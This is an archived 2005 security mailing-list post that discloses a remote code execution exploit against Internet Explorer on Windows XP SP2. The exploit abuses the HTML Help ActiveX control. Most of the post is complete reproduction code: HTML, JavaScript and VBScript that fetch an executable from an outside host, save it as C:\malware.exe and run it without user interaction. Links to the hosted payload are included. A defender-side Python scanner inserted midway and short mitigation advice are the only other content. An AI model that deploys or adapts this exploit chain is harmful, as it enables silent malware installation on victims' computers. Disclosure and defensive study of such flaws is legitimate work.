Message-ID: <20050106192711.64118.qmail@web61304.mail.yahoo.com>
From: shreddersub7 at yahoo.com (ShredderSub7)
Subject: Remote Code Execution with Parameters on Windows (XP SP2)
Remote Code Execution with Parameters on Windows (XP SP2): Updated (it can now install any malware file from the Internet and run it without user interaction needed)
PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
About the PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe-d.htm
------------------------
How does this exploit work?
The problem with Internet Explorer is that it doesn't set any restrictions on web pages that request opening a Windows Help file compiled with HTML Help. Without such a restriction, we can (in Internet Explorer) easily command it to open any local web page stored on a victim's computer, including web pages that are found inside Windows Help files (with extension .CHM). In this PoC (Proof of Concept, see below for viewing the PoC), the web page "compile_date.htm" (which is found in the Windows Help file "ntshared.chm") will be opened in HTML Help.
Since we have now opened a web page stored in a Windows Help file (.CHM), it is possible (thanks to the exploit) to execute an ActiveX control that only fully works in HTML Help files. This ActiveX control can do anything: it can write files to your hard disk and afterwards it can execute those files. So in this PoC, we chose to launch an ActiveX control for HTML Help that will first write the HTML application (.HTA file) "cmdexe.hta" to your C-drive.
Then we execute that file with the same type of ActiveX control. So in this PoC, it will execute the file "C:\cmdexe.hta" after it was written. This HTML application "C:\cmdexe.hta" was programmed to install the real malware onto your C-drive, in this PoC "C:\malware.exe".
When that is all done, we use the exploit one more time: we execute the malware. It is even possible to add parameters to the executed program. In this PoC, we started the malware file "C:\malware.exe" after it was written.
To make it complete, we delete the HTML application "C:\cmdexe.hta" because it is not used anymore. Also, the 2 programs that were needed (Internet Explorer and HTML Help) will be automatically shut down after the execution is finished, without user interaction.
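As a defender-side example added here (not code from the original post), the following Python 3 scanner (standard library only) flags HTML that embeds the hhctrl.ocx control with the Command/Item1 values the chain above relies on; the CLSID and the markers it looks for are taken from this post, and the sample page is constructed from the PoC's own OBJECT markup.

```python
from html.parser import HTMLParser
# CLSID of the HTML Help ActiveX control (hhctrl.ocx) embedded by the PoC above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
RISKY_COMMANDS = ("related topics", "shortcut")  # HHCtrl commands the chain relies on
RISKY_ITEM_MARKERS = ("ms-its:", "javascript:", ".exe", ".hta")  # Item1 payload markers

class HHCtrlScanner(HTMLParser):
    # Collects every <object> bound to hhctrl.ocx together with its <param>s.
    def __init__(self):
        super().__init__()
        self.objects = []      # [{"id": str, "params": {name: value}}, ...]
        self._current = None   # hhctrl object whose <param>s we are currently inside

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases attribute names
        if tag == "object":
            if HHCTRL_CLSID in a.get("classid", "").lower():
                self._current = {"id": a.get("id", ""), "params": {}}
                self.objects.append(self._current)
            else:
                self._current = None           # any other control is ignored
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def find_hhctrl_abuse(html):
    """Return [(object id, [reasons])] for hhctrl objects matching the PoC pattern."""
    scanner = HHCtrlScanner()
    scanner.feed(html)
    findings = []
    for obj in scanner.objects:
        reasons = []
        command = obj["params"].get("command", "").lower()
        if command.startswith(RISKY_COMMANDS):
            reasons.append("command=" + command)
        for name, value in obj["params"].items():
            if name.startswith("item") and any(m in value.lower() for m in RISKY_ITEM_MARKERS):
                reasons.append(name + "=" + value)
        if reasons:
            findings.append((obj["id"], reasons))
    return findings

# Constructed sample: both OBJECT styles used by the PoC (quoted and unquoted attributes).
SAMPLE_PAGE = """<html><body>
<OBJECT id="locate" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm"></OBJECT>
<object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/d /c start /min C:/cmdexe.hta'></object></body></html>"""
```

Running find_hhctrl_abuse(SAMPLE_PAGE) reports both objects; a page whose OBJECT tags carry any other CLSID, or none at all, yields an empty list.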
------------------------
How can you reproduce this PoC?
Create the file "cmdexe.htm" with the following code (please note that you may have to change some file paths!):
<html><head><title>CMDExe - PoC</title></head><body>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<body style=\\\"display:none\\\" scroll=\\\"no\\\"\"+String.fromCharCode(62)+\"<script language=\\\"javascript\\\" src=\\\"http://freehost19.websamba.com/shreddersub7/cmdexe.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",75);setTimeout("window.opener=null;window.close()",7000)</script></body></html>
-----
Then create the file "cmdexe.txt" (please note that you may have to change some file paths!):
function writehta(){
  document.write("<script language=\"vbscript\" src=\"http://freehost19.websamba.com/shreddersub7/cmdexe2.txt\"></script>");
}
function writeexe(){
  document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/d /c start /min C:/cmdexe.hta'></object><script>a.Click\(\)</script>");
}
function startexe(){
  document.write("<object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/d /c del \"C:/cmdexe.hta\"&&start C:/malware.exe'></object><object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>b.Click\(\);c.Click\(\)</script>");
}
setTimeout("writehta()",1);
setTimeout("writeexe()",2000);
setTimeout("startexe()",5000);
-----
If that's done, create the file "cmdexe2.txt" (please note that you may have to change some file paths!):
on error resume next
set conn = CreateObject("ADODB.Recordset")
With conn
  .Fields.Append "conn", 200, "3000"
  Call .Open
  Call .AddNew
  .Fields("conn").Value = "<body style=""display:none"" scroll=""no"">"
  Call .AddNew
  .Fields("conn").Value = "<script language=""vbscript"">: on error resume next : set o = CreateObject(""msxml2.XMLHTTP"") : o.open ""GET"",""http://freehost19.websamba.com/shreddersub7/cmdexe.exe"",False : o.send : set s = createobject(""adodb.stream"") : s.type=1 : s.open : s.write o.responseBody : s.savetofile ""C:\malware.exe"",2 : window.close()</script>"
  Call .Update
End With
conn.Save "C:\cmdexe.hta", adPersistXML
conn.Close
-----
If you want to use the same test malware file "cmdexe.exe" (again: only for testing, do not do any damage to someone's PC with it, or you're responsible!), you can find it here:
http://freehost19.websamba.com/shreddersub7/cmdexe.exe
-----
If you want to attack Windows XP RTM (Gold), Windows XP SP1 or Windows Server 2003 systems, you might have to upload the "hhctrl.ocx" file too:
http://freehost19.websamba.com/shreddersub7/hhctrl.ocx
------------------------
How to avoid this exploit...
Since there are still no patches from Microsoft available yet, here are some (temporary?) solutions:
Disable Internet Explorer, or disable Active Scripting.
Use another browser, for example Mozilla Firefox.
------------------------
To Microsoft: Disable the possibility to integrate HTML Help controls in HTML web pages.
Also, disable the possibility to open HTML Help files arbitrarily from an HTML web page.
And come on, use some more restricted security zones for HTML applications!
------------------------
You can find the PoC, as explained above, here:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
The PoC on this page installs and opens a test malware file on your C-drive (called "C:\malware.exe"), nothing more than that. It will not bring any harm to your PC.
Contact: ShredderSub7_at_yahoo.com (of course, replace the "_at_" part with an "@" if you want me to receive your email!)
------------------------
ShredderSub7